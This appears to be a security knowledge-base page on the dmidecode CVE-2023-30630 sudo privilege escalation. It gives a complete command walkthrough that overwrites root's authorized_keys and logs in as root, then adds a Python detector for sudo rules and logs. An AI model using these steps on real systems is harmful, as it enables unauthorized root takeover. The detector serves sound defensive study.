# Dmidecode - CVE-2023-30630

Dmidecode is a tool for dumping a computer's DMI (SMBIOS) table contents in a human-readable format. This table contains a description of the system's hardware components, as well as other useful pieces of information such as serial numbers and BIOS revisions.

When a low-privileged user is allowed to run `dmidecode` as root (for example through `sudo`), they can abuse the application to <mark style="color:red;">**escalate their privileges**</mark> to root through a <mark style="color:red;">**file write vulnerability**</mark>: the `--dump-bin` option writes an attacker-supplied table to an arbitrary path as root.

{% hint style="info" %}

* Files newly created through `dmidecode` will be owned by `root`. If you instead write to an already existing file, its content is overwritten but its ownership and permissions are preserved.
* You are **not** able to create directories with `dmidecode`. If you plan to privesc through `.ssh/authorized_keys`, the `.ssh` directory needs to exist already.
  * To privesc through `/root/.ssh/authorized_keys`, `PermitRootLogin` must be enabled in `/etc/ssh/sshd_config`.
* `dmidecode` adds junk at the beginning of the written file. This is not visible with `cat`, but you will see it with `vi`/`vim`. To circumvent this, place your SSH key on row 2 or below.
* `dmidecode` version 3.3 has a bug that makes the program SEGFAULT when this technique is attempted; the crash no longer occurs in version 3.4. This exploit works on **all versions between 1.8 and 3.4, except 3.3**.
{% endhint %}

Use the tool [`dmiwrite`](https://github.com/adamreiser/dmiwrite) to build the malicious payload.

```bash
## Find privesc vector on victim host
[user@victimHost index]$ sudo -l
User user may run the following commands on victimHost:
    (root) NOPASSWD: /usr/sbin/dmidecode

## Verify dmidecode version
[user@victimHost ~]$ /usr/sbin/dmidecode -V
3.2

## Create payload on local attack machine. Note that the first line will be overwritten with random characters, so the real payload needs to be on line 2 or below.
➜ cat authorized_keys
ssh-rsa nothing
ssh-rsa AAAAB3NzaC...[SNIP]

## Build payload with dmiwrite
➜ ./dmiwrite authorized_keys authorized_keys.dmi 
Wrote payload of length 741 to authorized_keys.dmi
Padding 982301 bytes to authorized_keys.dmi
	Setting checksum: memset(buf+30, 130, 1);

Wrote DMI header of length 32 to authorized_keys.dmi
Padding 65536 bytes to authorized_keys.dmi
Congratulations, authorized_keys.dmi looks like a valid DMI file.

## Upload file to victim
➜ nc -w3 victimHost 4488 < authorized_keys.dmi
[user@victimHost tmp]$ nc -lvp 4488 > authorized_keys.dmi

## Write file
[user@victimHost tmp]$ sudo /usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
# dmidecode 3.2
Scanning authorized_keys.dmi for entry point.
SMBIOS 2.1 present.
1 structures occupying 741 bytes.
Table at 0x00000000.

# Writing 741 bytes to /root/.ssh/authorized_keys.
# Writing 0 bytes to /root/.ssh/authorized_keys.
/root/.ssh/authorized_keys: fwrite: No such file or directory

## Login as root
dmiwrite-master ➜ ssh root@victimHost -i victim-id_rsa
[root@victimHost ~]# id
uid=0(root) gid=0(root) groups=0(root)
```

<figure><img src="/files/LmRDERvFBrBV7aJzlbGo" alt=""><figcaption><p>Image illustrating junk at the beginning of file</p></figcaption></figure>
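For the defensive side of the same behaviour, the following is an added example (not code from the original page or from the `dmiwrite` project) that audits the two artifacts shown above: a `sudo -l` listing that grants `dmidecode` as root, and sudo syslog entries in which `dmidecode` reads its table from a user-supplied file (`-d`/`--dev-mem` pointing somewhere other than `/dev/mem`) and writes it with `--dump-bin` into a sensitive location. The log lines and `sudo -l` output are constructed samples modelled on the session above; the syslog format (`sudo: user : TTY=... ; COMMAND=...`) is the standard one sudo emits, and the list of sensitive prefixes is an assumption you would tune per environment.

```python
import os
import re
import shlex

# Constructed sample sudo syslog lines (not taken from a real host).
SAMPLE_SUDO_LOG = """\
Mar 10 12:00:01 victimHost sudo:     user : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
Mar 10 12:01:12 victimHost sudo:    admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/sbin/dmidecode -t system
Mar 10 12:02:30 victimHost sudo:    admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/sbin/dmidecode --dump-bin /var/tmp/smbios.bin
Mar 10 12:03:45 victimHost sudo:     user : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/dmidecode --dev-mem /tmp/table.bin --dump-bin /tmp/out.bin
Mar 10 12:04:00 victimHost sudo:    admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Constructed sample `sudo -l` output, shaped like the one in the session above.
SAMPLE_SUDO_L = """\
User user may run the following commands on victimHost:
    (root) NOPASSWD: /usr/sbin/dmidecode
    (root) /usr/bin/systemctl restart nginx
"""

SUDO_LOG_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?COMMAND=(?P<cmd>.*)$")
SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<nopw>NOPASSWD:\s*)?(?P<cmds>.+)$")

# Assumed set of directories where a root-written binary dump has no legitimate purpose.
SENSITIVE_PREFIXES = ("/root/", "/etc/", "/home/")


def parse_dmidecode_args(cmd):
    """Return (dump_bin_target, dev_mem_source) from a dmidecode command line.

    Handles both the separated form (--dump-bin FILE) and the getopt_long
    joined form (--dump-bin=FILE). Either value is None when absent.
    """
    argv = shlex.split(cmd)
    dump = devmem = None
    for i, arg in enumerate(argv):
        if arg == "--dump-bin" and i + 1 < len(argv):
            dump = argv[i + 1]
        elif arg.startswith("--dump-bin="):
            dump = arg.split("=", 1)[1]
        elif arg in ("-d", "--dev-mem") and i + 1 < len(argv):
            devmem = argv[i + 1]
        elif arg.startswith("--dev-mem="):
            devmem = arg.split("=", 1)[1]
    return dump, devmem


def analyze_sudo_log(text):
    """Flag sudo'd dmidecode runs that write a dump somewhere sensitive or
    read their table from a file instead of /dev/mem (the CVE-2023-30630 pattern)."""
    findings = []
    for line in text.splitlines():
        match = SUDO_LOG_RE.search(line)
        if not match:
            continue
        cmd = match.group("cmd")
        argv = cmd.split()
        if not argv or os.path.basename(argv[0]) != "dmidecode":
            continue
        dump, devmem = parse_dmidecode_args(cmd)
        if dump is None:
            continue  # read-only dmidecode usage, nothing written
        reasons = []
        if devmem is not None and devmem != "/dev/mem":
            reasons.append("table source is a user-supplied file (%s), not /dev/mem" % devmem)
        if os.path.normpath(dump).startswith(SENSITIVE_PREFIXES):
            reasons.append("dump target %s is in a sensitive location" % dump)
        if reasons:
            findings.append({"user": match.group("user"), "target": dump, "reasons": reasons})
    return findings


def find_dmidecode_sudo_rules(sudo_l_output):
    """Return (runas, nopasswd, command) for every `sudo -l` rule granting dmidecode."""
    rules = []
    for line in sudo_l_output.splitlines():
        match = SUDO_RULE_RE.match(line)
        if not match:
            continue
        for command in match.group("cmds").split(","):
            command = command.strip()
            if command and os.path.basename(command.split()[0]) == "dmidecode":
                rules.append((match.group("runas"), match.group("nopw") is not None, command))
    return rules


if __name__ == "__main__":
    for rule in find_dmidecode_sudo_rules(SAMPLE_SUDO_L):
        print("risky sudo rule:", rule)
    for finding in analyze_sudo_log(SAMPLE_SUDO_LOG):
        print("suspicious dmidecode write:", finding)
```

The third sample line (a dump to `/var/tmp` read from the real `/dev/mem`) is deliberately left unflagged, since that is how an administrator legitimately archives the SMBIOS table; the signal for this CVE is the combination of a non-`/dev/mem` source with a `--dump-bin` target, which is what the first and fourth lines trigger on.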
